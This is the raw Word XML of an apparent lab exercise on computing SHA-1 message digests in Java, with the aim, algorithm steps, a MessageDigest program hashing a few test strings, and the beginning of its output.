    <w:p w14:paraId="4371431C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2873DE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="65"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09F1FEAB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C392B5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
      </w:pP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message digest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SHA-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DFE027" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="211"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A70D10" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EACF0EE" w14:textId="77777777" w:rsidR="00A16F47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34" w:line="322" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Append</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Padding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Bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA3DDA8" w14:textId="77777777" w:rsidR="00A16F47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line="322" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359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64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7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appended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end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B7855" w14:textId="77777777" w:rsidR="00A16F47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Prepare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Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C429ED" w14:textId="77777777" w:rsidR="00A16F47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line="322" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prepare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Constants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678922CA" w14:textId="77777777" w:rsidR="00A16F47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line="319" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Initialize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Buffers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13089A58" w14:textId="77777777" w:rsidR="00A16F47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line="319" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Processing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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512-bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>blocks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>blocks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message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C15D837" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D14A34C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC99B57" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="203"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20590E7B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38D4F2A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F22C6DD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sha1.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6433E67F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="360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java.security.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E8AA7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="86"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB9ED74" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="36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sha1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3D74B3E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:ind w:left="638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main(String[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>{ 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56E43AB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="hyphen" w:pos="8353"/>
        </w:tabs>
        <w:spacing w:before="233"/>
        <w:ind w:left="1198" w:right="1849"/>
      </w:pPr>
      <w:r>
        <w:t>MessageDigest md = MessageDigest.getInstance("SHA1"); System.out.println("Message digest object info:\n</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3226CF2A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Algorithm="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19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md.getAlgorithm());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.println("Provider="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E64225" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198" w:right="2222"/>
      </w:pPr>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>md.getProvider());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>System.out.println("ToString="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md.toString()); String input = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D844EA6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198" w:right="5720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>md.update(input.getBytes());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">byte[] </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">output = md.digest(); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.println();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C9FB8B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("SHA1(\""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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"\")="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bytesToHex(output));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"abc"; md.update(input.getBytes()); output =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC3B0AE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>md.digest();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.println();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005DCAFF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198" w:right="1100"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("SHA1(\""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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"\")="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bytesToHex(output));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"abcdefghijklmnopqrstuvwxyz";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29414C90" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198" w:right="5229"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>md.update(input.getBytes());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:t>md.digest(); System.out.println();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923056F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("SHA1(\""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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"\")="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bytesToHex(output));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.println();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F94425F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:ind w:left="917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spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.println("Exception:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C3288D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>e);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF79498" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="31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470C7039" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="207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433A0EDA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24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589A5D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="74"/>
        <w:ind w:left="638"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12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bytesToHex(byte[]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>b)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3269B1B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="48"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hexDigit[]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'0',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'1',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'2',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'3',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'4',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'5',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'6',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'7',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'8',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'9',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'A',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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'C',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'D',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'E',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'F'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1932EE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>buf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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>StringBuffer();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C378F3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4603EDB9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(byte aB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FC3BE2E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1198" w:right="5229"/>
      </w:pPr>
      <w:r>
        <w:t>buf.append(hexDigit[(aB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>4)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0x0f]); buf.append(hexDigit[aB &amp; 0x0f]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3363BABC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="917"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FF97D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="129"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F70C8E7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="917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buf.toString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D82FCB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="46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64AE4B79" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20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D923ACD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE675C8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D41530C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1BC195" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DE633E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="173"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139233DE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADC862A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="33"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>digest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spacing w:val="-4"/>
        </w:rPr>
        <w:t>info:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2913F424" w14:textId="77777777" w:rsidR="00A16F47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5A8BBC0" wp14:editId="753792EF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>130457</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="219202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2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2020">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21917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24E99" id="Graphic 161" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:10.25pt;width:172.6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2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YRFwIAAF4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0Xxx7WNoacYqhQYcB&#10;RVegGXZWZDk2JksaqcTOvx8lfyTrbsN8EEjxiXrko7y+71vNTgqwsabg6WLJmTLSlo05FPz77vHD&#10;LWfohSmFtkYV/KyQ32/ev1t3LleZra0uFTBKYjDvXMFr712eJChr1QpcWKcMBSsLrfDkwiEpQXSU&#10;vdVJtlyuks5C6cBKhUi72yHINzF/VSnpv1UVKs90wYmbjyvEdR/WZLMW+QGEqxs50hD/wKIVjaFL&#10;51Rb4QU7QvNXqraRYNFWfiFtm9iqaqSKNVA16fJNNa+1cCrWQs1BN7cJ/19a+Xx6dS8QqKN7svIn&#10;UkeSzmE+R4KDI6avoA1YIs762MXz3EXVeyZpM0vvsmVGzZYUS7Ob2ORE5NNZeUT/RdmYR5ye0A8a&#10;lJMl6smSvZlMICWDhjpq6DkjDYEz0nA/aOiED+cCuWCy7kIk7LX2pHY2Rv0b5kTtEtXmGkWlpDer&#10;FWdTlYQdEGSEa6hXgxGvJvu6OG0Ci/Rj+uk2zgZa3ZSPjdaBBsJh/6CBnUSYzPiFQijFHzAH6LcC&#10;6wGHZwzOCNRmlGpQJ+i0t+X5BVhHA11w/HUUoDjTXw1NTJj+yYDJ2E8GeP1g4xuJPaJbd/0PAY4F&#10;AgX3JO6zneZR5JNuofoZG04a+/nobdUEUeMYDYxGh4Y4ljg+uPBKrv2IuvwWNr8BAAD//wMAUEsD&#10;BBQABgAIAAAAIQAxt2k33QAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BbsIwEETvlfgHayv1&#10;VpxGKaQhDooQPSD1AkU9O/E2iYjXUWwg7dd3OZXjzI5m3+TryfbigqPvHCl4mUcgkGpnOmoUHD/f&#10;n1MQPmgyuneECn7Qw7qYPeQ6M+5Ke7wcQiO4hHymFbQhDJmUvm7Raj93AxLfvt1odWA5NtKM+srl&#10;tpdxFC2k1R3xh1YPuGmxPh3OVgGiSdH8Vh/D5rjrluXua1s6q9TT41SuQAScwn8YbviMDgUzVe5M&#10;xouedZLwlqAgjl5BcCBJ32IQ1c1Ygixyeb+g+AMAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4A&#10;AADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAA&#10;IQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAA&#10;IQCZAWYRFwIAAF4EAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAI&#10;AAAAIQAxt2k33QAAAAkBAAAPAAAAAAAAAAAAAAAAAHEEAABkcnMvZG93bnJldi54bWxQSwUGAAAA&#10;AAQABADzAAAAewUAAAAA&#10;" path="m,l2191766,e" filled="f" strokeweight=".365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D89DEB8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="102"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D322A49" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="6526"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Algorithm=SHA1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">Provider=SUN </w:t>
      </w:r>
      <w:r>
        <w:t>version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
